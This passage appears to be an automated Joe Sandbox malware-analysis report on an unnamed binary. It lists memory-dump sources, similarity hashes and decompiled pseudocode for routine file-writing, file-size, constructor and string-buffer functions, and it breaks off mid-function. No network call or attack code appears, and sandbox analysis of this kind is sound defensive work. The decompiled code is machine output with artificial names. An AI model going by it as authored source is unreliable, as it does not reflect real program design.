                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocateErrorHeapLast_malloc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3224363687-0
                                                                                                                                                                                          • Opcode ID: 622a2d3ea6f93600c1032fb3a0542af1ac4324ced2832bb0ae63bddf92778317
                                                                                                                                                                                          • Instruction ID: 31b27106b60770718bb4794417f716332250fdaf9ded9a95677175c9832a60c8
                                                                                                                                                                                          • Opcode Fuzzy Hash: 622a2d3ea6f93600c1032fb3a0542af1ac4324ced2832bb0ae63bddf92778317
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0541D175601B018BE720EF64EC40B96F3E0FF80715F04892EE49983340E6B5A949C76A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C85B50 Relevance: 3.1, APIs: 2, Instructions: 102COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetFileSizeEx.KERNEL32(?,?,?,00000000,?,?,?), ref: 00C85B70
                                                                                                                                                                                          • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,00000000,?,?,?), ref: 00C85BC9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$PointerSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3549600656-0
                                                                                                                                                                                          • Opcode ID: 86d169db1392200a14c60536fc456fd620e0c60f44cf14d29e6a3d4265294fdd
                                                                                                                                                                                          • Instruction ID: 0b8d97c11dc1bb9c3173fdc2ca3ce002b2c3bcf614185c67a56c12a70cb1cc41
                                                                                                                                                                                          • Opcode Fuzzy Hash: 86d169db1392200a14c60536fc456fd620e0c60f44cf14d29e6a3d4265294fdd
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD21D2363043054BDB20EE6AEC80A5AB3D9EBD9755F454839F948C3340EA66AD0D8779
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CEEBFC Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 85%
                                                                                                                                                                                          			E00CEEBFC() {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t36;
				void* _t38;
				intOrPtr _t39;
				int _t48;
				intOrPtr* _t49;
				int _t54;
				intOrPtr* _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t63;
				intOrPtr _t65;
				signed int _t66;
				long _t67;
				intOrPtr _t71;
				signed int _t73;
				signed int _t74;
				void* _t76;

				_t74 = _t76 - 0xf98;
				E00D00E90(0x1018);
				_t36 =  *0xd64070; // 0x8a9e1774
				 *(_t74 + 0xf94) = _t36 ^ _t74;
				_t38 =  *(_t74 + 0xfa0);
				_t63 =  *((intOrPtr*)(_t74 + 0xfac));
				_t58 =  *((intOrPtr*)(_t74 + 0xfa4));
				_push(0x1000);
				 *(_t74 - 0x80) = _t38;
				 *((intOrPtr*)(_t74 - 0x7c)) = _t63;
				if(_t38 == 0xffffffff || _t58 == 0) {
					L16:
					_t39 = 0;
					goto L17;
				} else {
					_t66 =  *(_t74 + 0xfa8);
					if(_t66 <= 0) {
						goto L16;
					}
					asm("cdq");
					_t73 = _t66 + _t63 >> 0xc;
					_t67 = _t66 & 0x80000fff;
					if(_t67 < 0) {
						_t67 = (_t67 - 0x00000001 | 0xfffff000) + 1;
					}
					 *(_t74 - 0x70) =  *(_t74 - 0x70) & 0x00000000;
					 *(_t74 - 0x78) =  *(_t74 - 0x78) & 0x00000000;
					 *((intOrPtr*)(_t74 - 0x74)) = _t58;
					if(_t73 <= 0) {
						L11:
						if(_t67 <= 0) {
							L15:
							_t39 = 1;
							L17:
							_pop(_t65);
							_pop(_t71);
							_pop(_t57);
							return E00D0071A(_t39, _t57,  *(_t74 + 0xf94) ^ _t74, _t63, _t65, _t71);
						}
						E00D06580(0x1000, _t67, _t73, _t74 - 0x6c,  *((intOrPtr*)(_t74 - 0x74)), _t67);
						_t48 = WriteFile( *(_t74 - 0x80), _t74 - 0x6c, _t67, _t74 - 0x70, 0); // executed
						if(_t48 == 0) {
							goto L16;
						}
						_t49 =  *((intOrPtr*)(_t74 - 0x7c));
						if(_t49 != 0) {
							 *_t49 =  *_t49 +  *(_t74 - 0x70);
						}
						goto L15;
					} else {
						while(1) {
							E00D06580(0x1000, _t67, _t73, _t74 - 0x6c,  *((intOrPtr*)(_t74 - 0x74)), 0x1000);
							_t76 = _t76 + 0xc;
							_t54 = WriteFile( *(_t74 - 0x80), _t74 - 0x6c, 0x1000, _t74 - 0x70, 0); // executed
							if(_t54 == 0) {
								goto L16;
							}
							_t55 =  *((intOrPtr*)(_t74 - 0x7c));
							if(_t55 != 0) {
								 *_t55 =  *_t55 +  *(_t74 - 0x70);
							}
							 *((intOrPtr*)(_t74 - 0x74)) =  *((intOrPtr*)(_t74 - 0x74)) + 0x1000;
							 *(_t74 - 0x78) =  *(_t74 - 0x78) + 1;
							if( *(_t74 - 0x78) < _t73) {
								continue;
							} else {
								goto L11;
							}
						}
						goto L16;
					}
				}
			}























                                                                                                                                                                                          0x00ceebfd
                                                                                                                                                                                          0x00ceec09
                                                                                                                                                                                          0x00ceec0e
                                                                                                                                                                                          0x00ceec15
                                                                                                                                                                                          0x00ceec1b
                                                                                                                                                                                          0x00ceec21
                                                                                                                                                                                          0x00ceec27
                                                                                                                                                                                          0x00ceec2d
                                                                                                                                                                                          0x00ceec30
                                                                                                                                                                                          0x00ceec33
                                                                                                                                                                                          0x00ceec39
                                                                                                                                                                                          0x00ceed05
                                                                                                                                                                                          0x00ceed05
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceec47
                                                                                                                                                                                          0x00ceec47
                                                                                                                                                                                          0x00ceec4f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceec57
                                                                                                                                                                                          0x00ceec62
                                                                                                                                                                                          0x00ceec65
                                                                                                                                                                                          0x00ceec6b
                                                                                                                                                                                          0x00ceec74
                                                                                                                                                                                          0x00ceec74
                                                                                                                                                                                          0x00ceec75
                                                                                                                                                                                          0x00ceec79
                                                                                                                                                                                          0x00ceec7d
                                                                                                                                                                                          0x00ceec82
                                                                                                                                                                                          0x00ceecc8
                                                                                                                                                                                          0x00ceecca
                                                                                                                                                                                          0x00ceed00
                                                                                                                                                                                          0x00ceed02
                                                                                                                                                                                          0x00ceed07
                                                                                                                                                                                          0x00ceed0d
                                                                                                                                                                                          0x00ceed0e
                                                                                                                                                                                          0x00ceed11
                                                                                                                                                                                          0x00ceed1e
                                                                                                                                                                                          0x00ceed1e
                                                                                                                                                                                          0x00ceecd4
                                                                                                                                                                                          0x00ceecea
                                                                                                                                                                                          0x00ceecf2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceecf4
                                                                                                                                                                                          0x00ceecf9
                                                                                                                                                                                          0x00ceecfe
                                                                                                                                                                                          0x00ceecfe
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceec84
                                                                                                                                                                                          0x00ceec89
                                                                                                                                                                                          0x00ceec91
                                                                                                                                                                                          0x00ceec96
                                                                                                                                                                                          0x00ceeca7
                                                                                                                                                                                          0x00ceecaf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceecb1
                                                                                                                                                                                          0x00ceecb6
                                                                                                                                                                                          0x00ceecbb
                                                                                                                                                                                          0x00ceecbb
                                                                                                                                                                                          0x00ceecbd
                                                                                                                                                                                          0x00ceecc0
                                                                                                                                                                                          0x00ceecc6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceecc6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ceec89
                                                                                                                                                                                          0x00ceec82

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00001000,?,00000000), ref: 00CEECA7
                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00CEECEA
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileWrite
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3934441357-0
                                                                                                                                                                                          • Opcode ID: e06885474634923845eecdd9c6a65cc3ac411daa1448eaef74f2608265ecf44c
                                                                                                                                                                                          • Instruction ID: bb4d8cd7d68c90469d7c2fa7bb19985051a62b52a47f2e78e27716076b0896ed
                                                                                                                                                                                          • Opcode Fuzzy Hash: e06885474634923845eecdd9c6a65cc3ac411daa1448eaef74f2608265ecf44c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 19315E72A006499FDB34CFA9DC44BEE777AFF44354F250539E818E7282E7309A059B60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CB8CC0 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 97%
                                                                                                                                                                                          			E00CB8CC0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				intOrPtr* _t72;
				void* _t88;
				intOrPtr* _t92;
				void* _t93;

				_t88 = __edx;
				_push(4);
				E00D0155A(0xd32777, __ebx, __edi, __esi);
				_t92 = __ecx;
				 *((intOrPtr*)(_t93 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0;
				 *((intOrPtr*)(__ecx + 0x18)) = 0;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(_t93 - 4)) = 0;
				E00CB7C33(__ebx, __ecx + 0x7e, __ecx, 0);
				_t72 = __ecx + 0x24;
				 *((char*)(_t93 - 4)) = 1;
				 *((intOrPtr*)(__ecx + 0x20)) = 0xd3e8f0;
				E00CC61F6(_t72, _t72, 0, __ecx, 0);
				 *((intOrPtr*)(_t92 + 0x76)) = 0xd3e8f8;
				 *((intOrPtr*)(_t92 + 0x7a)) = 0xd3e934;
				E00CB6BAA(_t92 + 0x96);
				 *((char*)(_t93 - 4)) = 3;
				 *_t92 = 0xd3ea24;
				 *((intOrPtr*)(_t92 + 0x20)) = 0xd3ea1c;
				 *_t72 = 0xd3ea14;
				 *((intOrPtr*)(_t92 + 0x76)) = 0xd3ea0c;
				 *((intOrPtr*)(_t92 + 0x7a)) = 0xd3e9bc;
				E00CB8C2B(_t72, _t92 + 0xbe, 0, _t92, 0);
				 *((char*)(_t93 - 4)) = 4;
				E00CB6066(_t92 + 0xd6, _t92, 0); // executed
				 *((char*)(_t93 - 4)) = 5;
				E00CB60B7(_t92 + 0xda, _t92, 0);
				 *((char*)(_t93 - 4)) = 6;
				E00CB6108(_t92 + 0xde, _t88, _t92, 0, __fp0);
				 *((char*)(_t93 - 4)) = 7;
				E00CB6161(_t92 + 0xe2, _t92, 0);
				 *((char*)(_t93 - 4)) = 8;
				E00CB61AF(_t72, _t92 + 0xe6, 0, _t92, 0);
				 *((char*)(_t93 - 4)) = 9;
				 *((intOrPtr*)(_t92 + 0xea)) = 0;
				E00CEB7FE(_t72, _t92 + 0xee, 0, _t92, 0);
				 *((char*)(_t93 - 4)) = 0xa;
				E00CD19D3(_t72, _t92 + 0x14a, 0, _t92, 0);
				 *((char*)(_t93 - 4)) = 0xb;
				E00CD19D3(_t72, _t92 + 0x222, 0, _t92, 0);
				 *((char*)(_t93 - 4)) = 0xc;
				E00CEF953(_t92 + 0x6ba);
				 *((char*)(_t93 - 4)) = 0xd;
				 *((intOrPtr*)(_t92 + 0x6ce)) = 0;
				 *((intOrPtr*)(_t92 + 0x6de)) = 0;
				 *((intOrPtr*)(_t92 + 0x6e6)) = 0;
				E00CE91F1(_t92 + 0x6ea, 0, _t92, 0);
				 *((intOrPtr*)(_t92 + 0x2fa)) = 0;
				 *((intOrPtr*)(_t92 + 0x142)) = 0x5003;
				 *((intOrPtr*)(_t92 + 0x146)) = 0x3000;
				 *((intOrPtr*)(_t92 + 0x6b6)) = 0;
				 *((intOrPtr*)(_t92 + 0x6d2)) = 0;
				 *((intOrPtr*)(_t92 + 0x6d6)) = 0;
				 *((intOrPtr*)(_t92 + 0x6e2)) = 0;
				E00D006A0(0, _t92 + 0x2fe, 0, 0x3b8);
				return E00D01632(_t92);
			}







                                                                                                                                                                                          0x00cb8cc0
                                                                                                                                                                                          0x00cb8cc0
                                                                                                                                                                                          0x00cb8cc7
                                                                                                                                                                                          0x00cb8ccc
                                                                                                                                                                                          0x00cb8cce
                                                                                                                                                                                          0x00cb8cd3
                                                                                                                                                                                          0x00cb8cd6
                                                                                                                                                                                          0x00cb8cd9
                                                                                                                                                                                          0x00cb8cdc
                                                                                                                                                                                          0x00cb8ce2
                                                                                                                                                                                          0x00cb8ce5
                                                                                                                                                                                          0x00cb8cea
                                                                                                                                                                                          0x00cb8cef
                                                                                                                                                                                          0x00cb8cf3
                                                                                                                                                                                          0x00cb8cfa
                                                                                                                                                                                          0x00cb8cff
                                                                                                                                                                                          0x00cb8d0c
                                                                                                                                                                                          0x00cb8d13
                                                                                                                                                                                          0x00cb8d1e
                                                                                                                                                                                          0x00cb8d22
                                                                                                                                                                                          0x00cb8d28
                                                                                                                                                                                          0x00cb8d2f
                                                                                                                                                                                          0x00cb8d35
                                                                                                                                                                                          0x00cb8d3c
                                                                                                                                                                                          0x00cb8d43
                                                                                                                                                                                          0x00cb8d4e
                                                                                                                                                                                          0x00cb8d52
                                                                                                                                                                                          0x00cb8d5d
                                                                                                                                                                                          0x00cb8d61
                                                                                                                                                                                          0x00cb8d6c
                                                                                                                                                                                          0x00cb8d70
                                                                                                                                                                                          0x00cb8d7b
                                                                                                                                                                                          0x00cb8d7f
                                                                                                                                                                                          0x00cb8d8a
                                                                                                                                                                                          0x00cb8d8e
                                                                                                                                                                                          0x00cb8d99
                                                                                                                                                                                          0x00cb8d9d
                                                                                                                                                                                          0x00cb8da3
                                                                                                                                                                                          0x00cb8dae
                                                                                                                                                                                          0x00cb8db2
                                                                                                                                                                                          0x00cb8dbd
                                                                                                                                                                                          0x00cb8dc1
                                                                                                                                                                                          0x00cb8dcc
                                                                                                                                                                                          0x00cb8dd0
                                                                                                                                                                                          0x00cb8ddb
                                                                                                                                                                                          0x00cb8ddf
                                                                                                                                                                                          0x00cb8de5
                                                                                                                                                                                          0x00cb8deb
                                                                                                                                                                                          0x00cb8df1
                                                                                                                                                                                          0x00cb8df6
                                                                                                                                                                                          0x00cb8dfc
                                                                                                                                                                                          0x00cb8e06
                                                                                                                                                                                          0x00cb8e10
                                                                                                                                                                                          0x00cb8e16
                                                                                                                                                                                          0x00cb8e1c
                                                                                                                                                                                          0x00cb8e22
                                                                                                                                                                                          0x00cb8e35
                                                                                                                                                                                          0x00cb8e44

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CB8CC7
                                                                                                                                                                                            • Part of subcall function 00CB7C33: __EH_prolog3_catch.LIBCMT ref: 00CB7C3A
                                                                                                                                                                                            • Part of subcall function 00CB7C33: _memset.LIBCMT ref: 00CB7C98
                                                                                                                                                                                            • Part of subcall function 00CC61F6: __EH_prolog3.LIBCMT ref: 00CC61FD
                                                                                                                                                                                            • Part of subcall function 00CB8C2B: __EH_prolog3.LIBCMT ref: 00CB8C32
                                                                                                                                                                                            • Part of subcall function 00CB6066: __EH_prolog3.LIBCMT ref: 00CB606D
                                                                                                                                                                                            • Part of subcall function 00CB60B7: __EH_prolog3.LIBCMT ref: 00CB60BE
                                                                                                                                                                                            • Part of subcall function 00CB6108: __EH_prolog3.LIBCMT ref: 00CB610F
                                                                                                                                                                                            • Part of subcall function 00CB6161: __EH_prolog3.LIBCMT ref: 00CB6168
                                                                                                                                                                                            • Part of subcall function 00CB61AF: __EH_prolog3.LIBCMT ref: 00CB61B6
                                                                                                                                                                                            • Part of subcall function 00CEB7FE: __EH_prolog3.LIBCMT ref: 00CEB805
                                                                                                                                                                                            • Part of subcall function 00CEB7FE: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000004,00CD9266,00000004,00CB6134,00000004,00CB8D75,00000004,00C9AFFB,00000038), ref: 00CEB864
                                                                                                                                                                                            • Part of subcall function 00CD19D3: __EH_prolog3.LIBCMT ref: 00CD19DA
                                                                                                                                                                                            • Part of subcall function 00CE91F1: __EH_prolog3.LIBCMT ref: 00CE91F8
                                                                                                                                                                                          • _memset.LIBCMT ref: 00CB8E35
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3$_memset$CreateEventH_prolog3_catch
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2735508590-0
                                                                                                                                                                                          • Opcode ID: 30de21654fc180c6e93c455c7ce42c0964d38904473eb86a105952fc3eeaedf3
                                                                                                                                                                                          • Instruction ID: 725e079209cc43b063a650ad2582cfda8e3033593ce841831d64980f0925c2a9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 30de21654fc180c6e93c455c7ce42c0964d38904473eb86a105952fc3eeaedf3
                                                                                                                                                                                          • Instruction Fuzzy Hash: D74114B4904B80DAD721EFB9C1557DEFBF4AFA4304F40484ED4AA57382DBB52608DB26
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9DED5 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                          			E00C9DED5(intOrPtr* __ecx, char* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t13;
				signed int _t14;
				short* _t16;
				short _t17;
				void* _t23;
				short* _t24;
				signed int _t33;
				signed int _t36;
				intOrPtr* _t38;
				void* _t41;

				_t13 = _a4;
				_t38 = __ecx;
				_t41 = _t13 -  *((intOrPtr*)(__ecx + 4));
				if(_t41 >= 0) {
					_push(_t23);
					_t36 = _t13 + _t13;
					_t33 = 2;
					_t14 = _t36;
					_t34 = _t14 * _t33 >> 0x20;
					_push( ~(0 | _t41 > 0x00000000) | _t14 * _t33); // executed
					_t16 = E00CFCE8A(_t23, _t14 * _t33 >> 0x20, _t36, _t41); // executed
					_t24 = _t16;
					if(_t24 == 0) {
						_a4 = "Fatal error: Out of memory!";
						E00D00729( &_a4, 0xd4f494);
					}
					_t43 =  *_t38;
					if( *_t38 == 0) {
						_t17 = 0;
						__eflags = 0;
						 *_t24 = 0;
					} else {
						E00D03717(_t24,  *_t38, E00C9DEA9(_t38, _t43) + 1);
						_push( *_t38);
						_t17 = E00D00BDC(_t24, _t34, _t36, _t38, _t43);
					}
					 *(_t38 + 4) = _t36;
					 *_t38 = _t24;
					return _t17;
				}
				return _t13;
			}

















                                                                                                                                                                                          0x00c9ded8
                                                                                                                                                                                          0x00c9dedc
                                                                                                                                                                                          0x00c9dede
                                                                                                                                                                                          0x00c9dee1
                                                                                                                                                                                          0x00c9dee3
                                                                                                                                                                                          0x00c9dee5
                                                                                                                                                                                          0x00c9deec
                                                                                                                                                                                          0x00c9deed
                                                                                                                                                                                          0x00c9deef
                                                                                                                                                                                          0x00c9def8
                                                                                                                                                                                          0x00c9def9
                                                                                                                                                                                          0x00c9defe
                                                                                                                                                                                          0x00c9df03
                                                                                                                                                                                          0x00c9df0e
                                                                                                                                                                                          0x00c9df15
                                                                                                                                                                                          0x00c9df15
                                                                                                                                                                                          0x00c9df1a
                                                                                                                                                                                          0x00c9df1d
                                                                                                                                                                                          0x00c9df3c
                                                                                                                                                                                          0x00c9df3c
                                                                                                                                                                                          0x00c9df3e
                                                                                                                                                                                          0x00c9df1f
                                                                                                                                                                                          0x00c9df2b
                                                                                                                                                                                          0x00c9df30
                                                                                                                                                                                          0x00c9df32
                                                                                                                                                                                          0x00c9df37
                                                                                                                                                                                          0x00c9df41
                                                                                                                                                                                          0x00c9df45
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9df47
                                                                                                                                                                                          0x00c9df4a

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __CxxThrowException@8.LIBCMT ref: 00C9DF15
                                                                                                                                                                                            • Part of subcall function 00D00729: RaiseException.KERNEL32(?,?,?,00C880B1,?,?,?,?,?,00C880B1,00D59760,00D59760), ref: 00D0076B
                                                                                                                                                                                          • _wcsncpy.LIBCMT ref: 00C9DF2B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ExceptionException@8RaiseThrow_wcsncpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3304455579-0
                                                                                                                                                                                          • Opcode ID: b7d083104629be72cbf21e637f53378ef4b82c12ba1579bbeeea59b3dbfc7387
                                                                                                                                                                                          • Instruction ID: a084b5589b73c99c4fe6bfd968eee9e70f0ee06296d94805f1d3eb38f9290182
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7d083104629be72cbf21e637f53378ef4b82c12ba1579bbeeea59b3dbfc7387
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1801D6B2201205AEEB24AF68CC86A6AF7DCEF94350F10442FF54BD6191DA7099409770
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9AE8B Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                          			E00C9AE8B(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t11;
				intOrPtr _t17;
				intOrPtr _t20;
				intOrPtr _t25;
				intOrPtr _t34;
				intOrPtr _t36;
				intOrPtr _t39;
				WCHAR* _t40;
				void* _t42;
				void* _t45;

				_t45 = __eflags;
				_t34 = __edx;
				_t40 = _t42 - 0x204;
				_t11 =  *0xd64070; // 0x8a9e1774
				_t40[0x104] = _t11 ^ _t40;
				E00D0155A(0xd2ff96, __ebx, __edi, __esi);
				GetModuleFileNameW(0, _t40, 0x104);
				_t17 =  *0xd5d01c; // 0xd5d014
				 *((intOrPtr*)(_t40 - 0x10)) = _t17;
